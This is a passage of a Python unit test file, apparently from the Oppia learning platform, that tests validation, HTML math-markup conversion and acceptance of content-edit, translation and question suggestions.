'html': 'new suggestion content'
},
'old_value': None
}
suggestion = suggestion_registry.SuggestionEditStateContent(
self.suggestion_dict['suggestion_id'],
self.suggestion_dict['target_id'],
self.suggestion_dict['target_version_at_submission'],
self.suggestion_dict['status'], self.author_id,
self.reviewer_id, change_dict,
self.suggestion_dict['score_category'],
self.suggestion_dict['language_code'], False, self.fake_date)
actual_outcome_list = suggestion.get_all_html_content_strings()
expected_outcome_list = [u'new suggestion content']
self.assertEqual(expected_outcome_list, actual_outcome_list)
def test_convert_html_in_suggestion_change(self):
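        # Legacy math RTE markup stores only a raw_latex-with-value
        # attribute; after conversion it should instead carry a
        # math_content-with-value dict containing the raw LaTeX and an
        # (empty) svg_filename.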
html_content = (
'<p>Value</p><oppia-noninteractive-math raw_latex-with-value="&a'
'mp;quot;+,-,-,+&quot;"></oppia-noninteractive-math>')
expected_html_content = (
'<p>Value</p><oppia-noninteractive-math math_content-with-value='
'"{&quot;raw_latex&quot;: &quot;+,-,-,+&quot;, &'
'amp;quot;svg_filename&quot;: &quot;&quot;}"></oppia'
'-noninteractive-math>')
change = {
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'Introduction',
'new_value': {
'content_id': 'content',
'html': '<p>suggestion</p>'
},
'old_value': {
'content_id': 'content',
'html': html_content
}
}
suggestion = suggestion_registry.SuggestionEditStateContent(
self.suggestion_dict['suggestion_id'],
self.suggestion_dict['target_id'],
self.suggestion_dict['target_version_at_submission'],
self.suggestion_dict['status'], self.author_id,
self.reviewer_id, change,
self.suggestion_dict['score_category'],
self.suggestion_dict['language_code'], False, self.fake_date)
suggestion.convert_html_in_suggestion_change(
html_validation_service.
add_math_content_to_math_rte_components)
self.assertEqual(
suggestion.change.old_value['html'], expected_html_content)
def test_get_target_entity_html_strings_returns_expected_strings(self):
change_dict = {
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'state_1',
'new_value': {
'content_id': 'content',
'html': 'new suggestion content'
},
'old_value': {
'content_id': 'content',
'html': 'Old content.'
}
}
suggestion = suggestion_registry.SuggestionEditStateContent(
self.suggestion_dict['suggestion_id'],
self.suggestion_dict['target_id'],
self.suggestion_dict['target_version_at_submission'],
self.suggestion_dict['status'], self.author_id,
self.reviewer_id, change_dict,
self.suggestion_dict['score_category'],
self.suggestion_dict['language_code'], False, self.fake_date)
actual_outcome_list = suggestion.get_target_entity_html_strings()
expected_outcome_list = [u'Old content.']
self.assertEqual(expected_outcome_list, actual_outcome_list)
def test_get_target_entity_html_with_none_old_value(self):
change_dict = {
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'state_1',
'new_value': {
'content_id': 'content',
'html': 'new suggestion content'
},
'old_value': None
}
suggestion = suggestion_registry.SuggestionEditStateContent(
self.suggestion_dict['suggestion_id'],
self.suggestion_dict['target_id'],
self.suggestion_dict['target_version_at_submission'],
self.suggestion_dict['status'], self.author_id,
self.reviewer_id, change_dict,
self.suggestion_dict['score_category'],
self.suggestion_dict['language_code'], False, self.fake_date)
actual_outcome_list = suggestion.get_target_entity_html_strings()
self.assertEqual(actual_outcome_list, [])
class SuggestionTranslateContentUnitTests(test_utils.GenericTestBase):
"""Tests for the SuggestionEditStateContent class."""
AUTHOR_EMAIL = '[email protected]'
REVIEWER_EMAIL = '[email protected]'
ASSIGNED_REVIEWER_EMAIL = '[email protected]'
fake_date = datetime.datetime(2016, 4, 10, 0, 0, 0, 0)
def setUp(self):
super(SuggestionTranslateContentUnitTests, self).setUp()
self.signup(self.AUTHOR_EMAIL, 'author')
self.author_id = self.get_user_id_from_email(self.AUTHOR_EMAIL)
self.signup(self.REVIEWER_EMAIL, 'reviewer')
self.reviewer_id = self.get_user_id_from_email(self.REVIEWER_EMAIL)
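        # A canonical "add written translation" suggestion dict. The change
        # payload uses exp_domain.CMD_ADD_WRITTEN_TRANSLATION; the tests
        # below copy this dict and mutate single fields to exercise each
        # validation rule.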
self.suggestion_dict = {
'suggestion_id': 'exploration.exp1.thread1',
'suggestion_type': (
feconf.SUGGESTION_TYPE_TRANSLATE_CONTENT),
'target_type': feconf.ENTITY_TYPE_EXPLORATION,
'target_id': 'exp1',
'target_version_at_submission': 1,
'status': suggestion_models.STATUS_ACCEPTED,
'author_name': 'author',
'final_reviewer_id': self.reviewer_id,
'change': {
'cmd': exp_domain.CMD_ADD_WRITTEN_TRANSLATION,
'state_name': 'Introduction',
'content_id': 'content',
'language_code': 'hi',
'content_html': '<p>This is a content.</p>',
'translation_html': '<p>This is translated html.</p>',
'data_format': 'html'
},
'score_category': 'translation.Algebra',
'language_code': 'hi',
'last_updated': utils.get_time_in_millisecs(self.fake_date),
'edited_by_reviewer': False
}
def test_pre_update_validate_fails_for_invalid_change_cmd(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
            expected_suggestion_dict['language_code'], False, self.fake_date)
change = {
'cmd': exp_domain.CMD_ADD_STATE,
'state_name': 'Introduction'
}
with self.assertRaisesRegex(
utils.ValidationError,
'The new change cmd must be equal to %s' % (
exp_domain.CMD_ADD_WRITTEN_TRANSLATION)
):
suggestion.pre_update_validate(exp_domain.ExplorationChange(change))
def test_pre_update_validate_change_state_name(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
            expected_suggestion_dict['language_code'], False, self.fake_date)
change = {
'cmd': exp_domain.CMD_ADD_WRITTEN_TRANSLATION,
'state_name': 'State 1',
'content_id': 'content',
'language_code': 'hi',
'content_html': '<p>This is a content.</p>',
'translation_html': '<p>This is the updated translated html.</p>',
'data_format': 'html'
}
with self.assertRaisesRegex(
utils.ValidationError,
'The new change state_name must be equal to Introduction'
):
suggestion.pre_update_validate(exp_domain.ExplorationChange(change))
def test_pre_update_validate_change_language_code(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
            expected_suggestion_dict['language_code'], False, self.fake_date)
change = {
'cmd': exp_domain.CMD_ADD_WRITTEN_TRANSLATION,
'state_name': 'Introduction',
'content_id': 'content',
'language_code': 'en',
'content_html': '<p>This is a content.</p>',
'translation_html': '<p>This is the updated translated html.</p>',
'data_format': 'html'
}
with self.assertRaisesRegex(
utils.ValidationError,
'The language code must be equal to hi'
):
suggestion.pre_update_validate(exp_domain.ExplorationChange(change))
def test_pre_update_validate_change_content_html(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
            expected_suggestion_dict['language_code'], False, self.fake_date)
change = {
'cmd': exp_domain.CMD_ADD_WRITTEN_TRANSLATION,
'state_name': 'Introduction',
'content_id': 'content',
'language_code': 'en',
'content_html': '<p>This is the changed content.</p>',
'translation_html': '<p>This is the updated translated html.</p>',
'data_format': 'html'
}
with self.assertRaisesRegex(
utils.ValidationError,
'The new change content_html must be equal to <p>This is a ' +
'content.</p>'
):
suggestion.pre_update_validate(
exp_domain.ExplorationChange(change))
def test_create_suggestion_add_translation(self):
expected_suggestion_dict = self.suggestion_dict
observed_suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
self.assertDictEqual(
observed_suggestion.to_dict(), expected_suggestion_dict)
def test_validate_suggestion_add_translation(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
def test_get_score_part_helper_methods(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
self.assertEqual(suggestion.get_score_type(), 'translation')
self.assertEqual(suggestion.get_score_sub_type(), 'Algebra')
def test_validate_suggestion_type(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.suggestion_type = 'invalid_suggestion_type'
with self.assertRaisesRegex(
utils.ValidationError,
'Expected suggestion_type to be among allowed choices'
):
suggestion.validate()
def test_validate_target_type(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.target_type = 'invalid_target_type'
with self.assertRaisesRegex(
utils.ValidationError,
'Expected target_type to be among allowed choices'
):
suggestion.validate()
def test_validate_target_id(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.target_id = 0
with self.assertRaisesRegex(
utils.ValidationError, 'Expected target_id to be a string'
):
suggestion.validate()
def test_validate_target_version_at_submission(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.target_version_at_submission = 'invalid_version'
with self.assertRaisesRegex(
utils.ValidationError,
'Expected target_version_at_submission to be an int'
):
suggestion.validate()
def test_validate_status(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.status = 'invalid_status'
with self.assertRaisesRegex(
utils.ValidationError, 'Expected status to be among allowed choices'
):
suggestion.validate()
def test_validate_author_id(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.author_id = 0
with self.assertRaisesRegex(
utils.ValidationError, 'Expected author_id to be a string'
):
suggestion.validate()
def test_validate_author_id_format(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.author_id = ''
with self.assertRaisesRegex(
utils.ValidationError,
'Expected author_id to be in a valid user ID format.'
):
suggestion.validate()
def test_validate_final_reviewer_id(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.final_reviewer_id = 1
with self.assertRaisesRegex(
utils.ValidationError, 'Expected final_reviewer_id to be a string'
):
suggestion.validate()
def test_validate_final_reviewer_id_format(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.final_reviewer_id = ''
with self.assertRaisesRegex(
utils.ValidationError,
'Expected final_reviewer_id to be in a valid user ID format'
):
suggestion.validate()
def test_validate_score_category(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.score_category = 0
with self.assertRaisesRegex(
utils.ValidationError, 'Expected score_category to be a string'
):
suggestion.validate()
def test_validate_score_category_format(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.score_category = 'score.score_type.score_sub_type'
with self.assertRaisesRegex(
utils.ValidationError,
'Expected score_category to be of the form'
' score_type.score_sub_type'
):
suggestion.validate()
suggestion.score_category = 'invalid_score_category'
with self.assertRaisesRegex(
utils.ValidationError,
'Expected score_category to be of the form'
' score_type.score_sub_type'
):
suggestion.validate()
def test_validate_score_type(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.score_category = 'invalid_score_type.score_sub_type'
with self.assertRaisesRegex(
utils.ValidationError,
'Expected the first part of score_category to be among allowed'
' choices'
):
suggestion.validate()
def test_validate_change(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.change = {}
with self.assertRaisesRegex(
utils.ValidationError, 'Expected change to be an ExplorationChange'
):
suggestion.validate()
def test_validate_score_type_translation(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.score_category = 'question.score_sub_type'
with self.assertRaisesRegex(
utils.ValidationError,
'Expected the first part of score_category to be translation'
):
suggestion.validate()
def test_validate_change_cmd(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.change.cmd = 'invalid_cmd'
with self.assertRaisesRegex(
utils.ValidationError, 'Expected cmd to be add_written_translation'
):
suggestion.validate()
def test_validate_language_code_fails_when_language_codes_do_not_match(
self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
expected_language_code = (
expected_suggestion_dict['change']['language_code']
)
suggestion.validate()
suggestion.language_code = 'wrong_language_code'
with self.assertRaisesRegex(
utils.ValidationError,
'Expected language_code to be %s, '
'received wrong_language_code' % expected_language_code
):
suggestion.validate()
def test_validate_language_code_fails_when_language_code_is_set_to_none(
self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.language_code = None
with self.assertRaisesRegex(
utils.ValidationError, 'language_code cannot be None'
):
suggestion.validate()
def test_validate_change_with_invalid_language_code_fails_validation(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.change.language_code = 'invalid_code'
with self.assertRaisesRegex(
utils.ValidationError, 'Invalid language_code: invalid_code'
):
suggestion.validate()
def test_pre_accept_validate_state_name(self):
self.save_new_default_exploration('exp1', self.author_id)
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
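        # Add 'State A' with matching content so the translation suggestion
        # passes pre-accept validation; an unknown state name should fail it.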
exp_services.update_exploration(
self.author_id, 'exp1', [
exp_domain.ExplorationChange({
'cmd': exp_domain.CMD_ADD_STATE,
'state_name': 'State A',
}),
exp_domain.ExplorationChange({
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'new_value': {
'content_id': 'content',
'html': '<p>This is a content.</p>'
},
'state_name': 'State A',
})
], 'Added state')
suggestion.change.state_name = 'State A'
suggestion.pre_accept_validate()
suggestion.change.state_name = 'invalid_state_name'
with self.assertRaisesRegex(
utils.ValidationError,
'Expected invalid_state_name to be a valid state name'
):
suggestion.pre_accept_validate()
def test_accept_suggestion_adds_translation_in_exploration(self):
self.save_new_default_exploration('exp1', self.author_id)
exploration = exp_fetchers.get_exploration_by_id('exp1')
self.assertEqual(exploration.get_translation_counts(), {})
suggestion = suggestion_registry.SuggestionTranslateContent(
self.suggestion_dict['suggestion_id'],
self.suggestion_dict['target_id'],
self.suggestion_dict['target_version_at_submission'],
self.suggestion_dict['status'], self.author_id,
self.reviewer_id, self.suggestion_dict['change'],
self.suggestion_dict['score_category'],
self.suggestion_dict['language_code'], False, self.fake_date)
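        # Accepting the suggestion should write the 'hi' translation into the
        # exploration and bump its translation counts.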
suggestion.accept(
'Accepted suggestion by translator: Add translation change.')
exploration = exp_fetchers.get_exploration_by_id('exp1')
self.assertEqual(exploration.get_translation_counts(), {
'hi': 1
})
def test_accept_suggestion_with_set_of_string_adds_translation(self):
self.save_new_default_exploration('exp1', self.author_id)
exploration = exp_fetchers.get_exploration_by_id('exp1')
self.assertEqual(exploration.get_translation_counts(), {})
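        # Translation suggestions can also carry list-valued content when
        # data_format is 'set_of_normalized_string'; accepting one should
        # still register a single 'hi' translation.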
suggestion = suggestion_registry.SuggestionTranslateContent(
self.suggestion_dict['suggestion_id'],
self.suggestion_dict['target_id'],
self.suggestion_dict['target_version_at_submission'],
self.suggestion_dict['status'], self.author_id,
self.reviewer_id,
{
'cmd': exp_domain.CMD_ADD_WRITTEN_TRANSLATION,
'state_name': 'Introduction',
'content_id': 'content',
'language_code': 'hi',
'content_html': ['text1', 'text2'],
'translation_html': ['translated text1', 'translated text2'],
'data_format': 'set_of_normalized_string'
},
self.suggestion_dict['score_category'],
self.suggestion_dict['language_code'], False, self.fake_date)
suggestion.accept(
'Accepted suggestion by translator: Add translation change.')
exploration = exp_fetchers.get_exploration_by_id('exp1')
self.assertEqual(exploration.get_translation_counts(), {
'hi': 1
})
    def test_accept_suggestion_with_pseudonymous_author_adds_translation(
            self):
self.save_new_default_exploration('exp1', self.author_id)
exploration = exp_fetchers.get_exploration_by_id('exp1')
self.assertEqual(exploration.get_translation_counts(), {})
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.PSEUDONYMOUS_ID,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.accept(
'Accepted suggestion by translator: Add translation change.')
exploration = exp_fetchers.get_exploration_by_id('exp1')
self.assertEqual(exploration.get_translation_counts(), {
'hi': 1
})
def test_get_all_html_content_strings(self):
suggestion = suggestion_registry.SuggestionTranslateContent(
self.suggestion_dict['suggestion_id'],
self.suggestion_dict['target_id'],
self.suggestion_dict['target_version_at_submission'],
self.suggestion_dict['status'], self.author_id,
self.reviewer_id, self.suggestion_dict['change'],
self.suggestion_dict['score_category'],
self.suggestion_dict['language_code'], False, self.fake_date)
actual_outcome_list = suggestion.get_all_html_content_strings()
expected_outcome_list = [
u'<p>This is translated html.</p>', u'<p>This is a content.</p>']
self.assertEqual(expected_outcome_list, actual_outcome_list)
def test_get_all_html_content_strings_for_content_lists(self):
suggestion = suggestion_registry.SuggestionTranslateContent(
self.suggestion_dict['suggestion_id'],
self.suggestion_dict['target_id'],
self.suggestion_dict['target_version_at_submission'],
self.suggestion_dict['status'], self.author_id,
self.reviewer_id,
{
'cmd': exp_domain.CMD_ADD_WRITTEN_TRANSLATION,
'state_name': 'Introduction',
'content_id': 'content',
'language_code': 'hi',
'content_html': ['text1', 'text2'],
'translation_html': ['translated text1', 'translated text2'],
'data_format': 'set_of_normalized_string'
},
self.suggestion_dict['score_category'],
self.suggestion_dict['language_code'], False, self.fake_date)
actual_outcome_list = suggestion.get_all_html_content_strings()
expected_outcome_list = [
'translated text1', 'translated text2', 'text1', 'text2']
self.assertEqual(expected_outcome_list, actual_outcome_list)
def test_get_target_entity_html_strings_returns_expected_strings(self):
suggestion = suggestion_registry.SuggestionTranslateContent(
self.suggestion_dict['suggestion_id'],
self.suggestion_dict['target_id'],
self.suggestion_dict['target_version_at_submission'],
self.suggestion_dict['status'], self.author_id,
self.reviewer_id, self.suggestion_dict['change'],
self.suggestion_dict['score_category'],
self.suggestion_dict['language_code'], False, self.fake_date)
actual_outcome_list = suggestion.get_target_entity_html_strings()
expected_outcome_list = [self.suggestion_dict['change']['content_html']]
self.assertEqual(expected_outcome_list, actual_outcome_list)
def test_convert_html_in_suggestion_change(self):
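        # Same legacy-to-new math RTE conversion as in the edit-state-content
        # tests above, but here the converted markup is expected in
        # change.content_html.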
html_content = (
'<p>Value</p><oppia-noninteractive-math raw_latex-with-value="&a'
'mp;quot;+,-,-,+&quot;"></oppia-noninteractive-math>')
expected_html_content = (
'<p>Value</p><oppia-noninteractive-math math_content-with-value='
'"{&quot;raw_latex&quot;: &quot;+,-,-,+&quot;, &'
'amp;quot;svg_filename&quot;: &quot;&quot;}"></oppia'
'-noninteractive-math>')
change_dict = {
'cmd': exp_domain.CMD_ADD_WRITTEN_TRANSLATION,
'state_name': 'Introduction',
'content_id': 'content',
'language_code': 'hi',
'content_html': html_content,
'translation_html': '<p>This is translated html.</p>',
'data_format': 'html'
}
suggestion = suggestion_registry.SuggestionTranslateContent(
self.suggestion_dict['suggestion_id'],
self.suggestion_dict['target_id'],
self.suggestion_dict['target_version_at_submission'],
self.suggestion_dict['status'], self.author_id,
self.reviewer_id, change_dict,
self.suggestion_dict['score_category'],
self.suggestion_dict['language_code'], False, self.fake_date)
suggestion.convert_html_in_suggestion_change(
html_validation_service.add_math_content_to_math_rte_components)
self.assertEqual(
suggestion.change.content_html, expected_html_content)
class SuggestionAddQuestionTest(test_utils.GenericTestBase):
"""Tests for the SuggestionAddQuestion class."""
AUTHOR_EMAIL = '[email protected]'
REVIEWER_EMAIL = '[email protected]'
ASSIGNED_REVIEWER_EMAIL = '[email protected]'
fake_date = datetime.datetime(2016, 4, 10, 0, 0, 0, 0)
def setUp(self):
super(SuggestionAddQuestionTest, self).setUp()
self.signup(self.AUTHOR_EMAIL, 'author')
self.author_id = self.get_user_id_from_email(self.AUTHOR_EMAIL)
self.signup(self.REVIEWER_EMAIL, 'reviewer')
self.reviewer_id = self.get_user_id_from_email(self.REVIEWER_EMAIL)
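        # A canonical "add question" suggestion dict targeting a skill. The
        # change payload wraps a full question_dict together with skill_id
        # and skill_difficulty; the tests below mutate these fields to
        # trigger specific validation errors.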
self.suggestion_dict = {
'suggestion_id': 'skill1.thread1',
'suggestion_type': feconf.SUGGESTION_TYPE_ADD_QUESTION,
'target_type': feconf.ENTITY_TYPE_SKILL,
'target_id': 'skill1',
'target_version_at_submission': 1,
'status': suggestion_models.STATUS_ACCEPTED,
'author_name': 'author',
'final_reviewer_id': self.reviewer_id,
'change': {
'cmd': question_domain.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION,
'question_dict': {
'question_state_data': self._create_valid_question_data(
'default_state').to_dict(),
'language_code': 'en',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION),
'linked_skill_ids': ['skill_1'],
'inapplicable_skill_misconception_ids': ['skillid12345-1']
},
'skill_id': 'skill_1',
'skill_difficulty': 0.3,
},
'score_category': 'question.topic_1',
'language_code': 'en',
'last_updated': utils.get_time_in_millisecs(self.fake_date),
'edited_by_reviewer': False
}
def test_create_suggestion_add_question(self):
expected_suggestion_dict = self.suggestion_dict
observed_suggestion = suggestion_registry.SuggestionAddQuestion(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
self.assertDictEqual(
observed_suggestion.to_dict(), expected_suggestion_dict)
    def test_validate_suggestion_add_question(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionAddQuestion(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
